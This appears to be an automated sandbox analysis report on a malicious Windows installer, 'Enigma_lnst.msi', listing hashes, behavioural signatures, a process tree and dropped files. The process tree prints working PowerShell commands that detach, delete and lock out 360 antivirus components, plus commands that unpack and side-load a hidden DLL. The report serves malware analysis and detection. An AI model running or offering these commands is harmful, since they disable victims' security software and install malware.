Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    12-07-2024 17:57

General

  • Target

    Enigma_lnst.msi

  • Size

    186.9MB

  • MD5

    1befc9492cae2fa2ff5a89177e9d3063

  • SHA1

    061f689bb3802cf3da9cb5f8658beb5895d5650f

  • SHA256

    90cee7a2160a5506535b05a1da860b3db9270154a27b4614001a73921eb516f3

  • SHA512

    c199d79049af3c486fcbe35d6ae0825a8c2cae134fec4fe740c55c3677b29b7527958aaaf1c44890472af0a8d9e0e0db1ed96ca979da0619e089ff2486038243

  • SSDEEP

    3145728:L7y8IlnJhDfWQ3yIe3EPleGEHmdygafuvI2tc9XzlRn6lF+RQ+ZspLkOvnkBM+k6:i8oDfW6yIpPwGEHmdafuvXc9Bpe+S+6y

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 11 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Enigma_lnst.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2948
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      PID:2444
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 51D123E60AA767B4C3FE88BFD9E93667
      2⤵
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Windows\SysWOW64\fltMC.exe
          fltmc.exe
          4⤵
          PID:3580
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360安全卫士*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360safe_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
        3⤵
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2056
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360sd_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
        3⤵
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:868
      • C:\ProgramData\Data\un.exe
        "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar qbcore.dll C:\ProgramData\
        3⤵
        • Executes dropped EXE
        PID:2744
      • C:\ProgramData\Data\un.exe
        "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\
        3⤵
        • Executes dropped EXE
        PID:2544
      • C:\ProgramData\iusb3mon.exe
        "C:\ProgramData\iusb3mon.exe" false
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4140
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo.>c:\odbc.inst.ini
          4⤵
          PID:4084
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\ProgramData\qbcore.dll,cef_v8value_create_string
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:3364
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo.>c:\inst.ini
          4⤵
          PID:1872
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo.>c:\inst.ini
          4⤵
          PID:356
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4632
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
    1⤵
    • Checks SCSI registry key(s)
    • Modifies data under HKEY_USERS
    PID:4112
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4420

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Config.Msi\e57c11e.rbs
    Filesize: 9KB
    MD5: 745b4027f2090a3566e61455bfab3242
    SHA1: 4444e8af0232d6516ce253623068e84205352837
    SHA256: cad5156c0a569f9ad772e8824b0f72c7ed227b57487474c7973872b669d57625
    SHA512: ecfb61f31f4ae1e01aba326c8ce6432c501b9236f0ccc6a042cdbf5b0237d40f6e0220514b11d6b7fc1f27cccb0663bfdca6bf7bba27f2d09d772c9ccb63fab3
  • C:\ProgramData\Data\rar.ini
    Filesize: 10B
    MD5: 51c11db1054dd4650a33bf481ec27060
    SHA1: 17686b75163d8753be27e407aad97a76f311fc7b
    SHA256: fc835086345b170ac995c35f24546e1b7268e3d3524a125a9396a4ec8b7d3f35
    SHA512: 94d5c2a0cb03b38657bab246a695c6528fc5f7d3ddbe716641dd59ec83a67d6ab28c083000026d10114e7ab8f8225f7c90c9fce25ef0611f46aa3899d096d80f
  • C:\ProgramData\Data\un.exe
    Filesize: 601KB
    MD5: 4fdc31997eb40979967fc04d9a9960f3
    SHA1: 7f13bd62c13324681913304644489bb6b66f584a
    SHA256: e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2
    SHA512: 15146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a
  • C:\ProgramData\Data\upx.rar
    Filesize: 2.3MB
    MD5: 6902353b10ae3b51d0d4dce6711bdc5e
    SHA1: 2c4abeda0be51037d90abdd22ce46660dc84a0fb
    SHA256: 525c842b1e10058e35b28593bcf2efd8b62e0587d5e0fc27e4289cdafaa9119a
    SHA512: fb7d0590934ee8cb28dca9b4e0c3d2ee751ecfeeaaa5d399cc01c147c1ff051b58b23f88bced572000db8516ec47b84c6a6604131d69a6dd9e80c010b482b047
  • C:\ProgramData\Microsoft\Program\ziliao.jpg
    Filesize: 356KB
    MD5: fae472e4f35ea37d87ec8e75f8f87424
    SHA1: dc4cecc39dcda0f27208d976f4c890aca60d38de
    SHA256: ece4bdb4d10691514983e689e00fe376cd96d47b59c19d418514df6e075635b0
    SHA512: 6bdc5e60d917007c5970cde0fe0d8bdbaa6285e8351968bba0db5c42230448a2d6028e4f1d29bfbb72224a7bdc10c85d45614a113896d4eaebead949990df845
  • C:\ProgramData\iusb3mon.exe
    Filesize: 604KB
    MD5: 75ff06aa5acfa803ad99b4fdcc43dd68
    SHA1: 8a120948f1e30fa8a2ef0d839c5300bbdfa9a8e4
    SHA256: a09ee1f7481c2f215c3a1d2335c5181fcf52eea7c9d82bb885cb14dc419d4e51
    SHA512: 71216288e436dab8d824cd9eb300286095687d855f5beb4e2732a8ef90c7536fad2d82ee61373e85a65a8950ce5979757518578d522bad6bd8496b363b9ead3c
  • C:\ProgramData\qbcore.dll
    Filesize: 2.7MB
    MD5: c31ab7e7b6832f1b99d6914e1594eb6d
    SHA1: ccc6f7e864548b9a7cbb5118c75e5f90db14ac5d
    SHA256: 3bda309984263aa5517dec01fbed324aaec44b514173aa7263cc9d2e0d2a5e73
    SHA512: ff358abab061cc85bb1f51fc6a4a954f46bcf79863728c83b023cecfda2e7f4b61b8d30fe609af3f7bf01b2c23be417eb22f71d7e68b35749d78b85083469f99
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: 6bf0e5945fb9da68e1b03bdaed5f6f8d
    SHA1: eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
    SHA256: dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
    SHA512: 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 17KB
    MD5: 44ff0d83a827473d136c879864c86215
    SHA1: 9fd087a54344aa27e00199edbd050c9d65f47a24
    SHA256: 97969d2c3d431d681d3f3693549fbc66faf473964b6807c25808efcc39d53fcb
    SHA512: fcf91b862df809d77ad5bf24901a5465ce5b58ff31757820a8042635674d8efbb6e4d65c11b16f15b28d7de174c722bb43bbb9211f0b667a8cc49876e0efb368
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdlxozif.35l.ps1
    Filesize: 1B
    MD5: c4ca4238a0b923820dcc509a6f75849b
    SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
    SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
    SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
  • C:\Windows\Installer\MSIC1C9.tmp
    Filesize: 990KB
    MD5: b9ff2dd6924711531e59e90581cda548
    SHA1: 6c8d572587c40a1fd8c20bd4f1929bb0fbb12009
    SHA256: ad564d4d64bb74ea6819e081534131f6f78e3c019d37abbc3eef8e09dfed96d7
    SHA512: d026c8128c1a182aa7f9d7cba179b411ad679e3bf89723a3498ab493cb6938579ee703ade35595f6b5178413e0df7f6f9a152a5036759e42f1d6f52cc0a61227
  • C:\odbc.inst.ini
    Filesize: 2B
    MD5: 81051bcc2cf1bedf378224b0a93e2877
    SHA1: ba8ab5a0280b953aa97435ff8946cbcbb2755a27
    SHA256: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
    SHA512: 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
  • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
    Filesize: 26.0MB
    MD5: da040b8c7df5d95320e44aa7787676d2
    SHA1: 0bf3d55c5554701c72ad75d0037143344df9e0f1
    SHA256: 3e07195425df18e7a9db152888d540b042011c5de5497ca4d3846cdeb8feb8b2
    SHA512: 40be6e65b99dfe85b7b42fdccc82fd3f8d651b9dd8ce4f33439817218944941886b72bf8104f63b8c2d7ee7464d0217d93a31cabfe13dbcc7f172ebfb8b01beb
  • \??\Volume{38ff9706-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{7a2b7b12-d448-4639-9068-5df872bd9100}_OnDiskSnapshotProp
    Filesize: 5KB
    MD5: ff9b21de4ccdca6d703486ec39c9003c
    SHA1: ccb25f7316a6dcfae41b64bb544a437eedd84b51
    SHA256: 008f9d221074cfbd53abe1652915e1dff0c9d4dc1a621926895628fa748a9542
    SHA512: 2023962c757c071f25680254756851fb91696bec273fa524f29553a4c049303e900e0f6ed4394cdb749b589e1d66032fc0d4c5852627cd6efec984fb43f284f2
  • memory/868-25-0x0000000006F80000-0x0000000006FE6000-memory.dmp
    Filesize: 408KB
  • memory/868-24-0x0000000006F10000-0x0000000006F76000-memory.dmp
    Filesize: 408KB
  • memory/868-21-0x0000000001010000-0x0000000001046000-memory.dmp
    Filesize: 216KB
  • memory/2056-28-0x0000000007F00000-0x0000000007F4B000-memory.dmp
    Filesize: 300KB
  • memory/2056-26-0x0000000007670000-0x00000000079C0000-memory.dmp
    Filesize: 3.3MB
  • memory/2056-86-0x0000000008E80000-0x0000000008F14000-memory.dmp
    Filesize: 592KB
  • memory/2056-87-0x0000000008B90000-0x0000000008BAA000-memory.dmp
    Filesize: 104KB
  • memory/2056-88-0x0000000008DE0000-0x0000000008E02000-memory.dmp
    Filesize: 136KB
  • memory/2056-32-0x0000000007D20000-0x0000000007D96000-memory.dmp
    Filesize: 472KB
  • memory/2056-22-0x0000000007040000-0x0000000007668000-memory.dmp
    Filesize: 6.2MB
  • memory/2056-23-0x0000000006CB0000-0x0000000006CD2000-memory.dmp
    Filesize: 136KB
  • memory/2056-27-0x0000000006EF0000-0x0000000006F0C000-memory.dmp
    Filesize: 112KB
  • memory/2056-89-0x0000000009420000-0x000000000991E000-memory.dmp
    Filesize: 5.0MB
  • memory/3364-129-0x00000000728A0000-0x0000000072B59000-memory.dmp
    Filesize: 2.7MB
  • memory/3364-154-0x00000000728A0000-0x0000000072B59000-memory.dmp
    Filesize: 2.7MB
  • memory/3364-179-0x00000000728A0000-0x0000000072B59000-memory.dmp
    Filesize: 2.7MB
  • memory/4140-134-0x0000000010000000-0x0000000010061000-memory.dmp
    Filesize: 388KB
  • memory/4140-125-0x00000000728A0000-0x0000000072B59000-memory.dmp
    Filesize: 2.7MB
  • memory/4140-153-0x00000000728A0000-0x0000000072B59000-memory.dmp
    Filesize: 2.7MB
  • memory/4140-164-0x00000000728A0000-0x0000000072B59000-memory.dmp
    Filesize: 2.7MB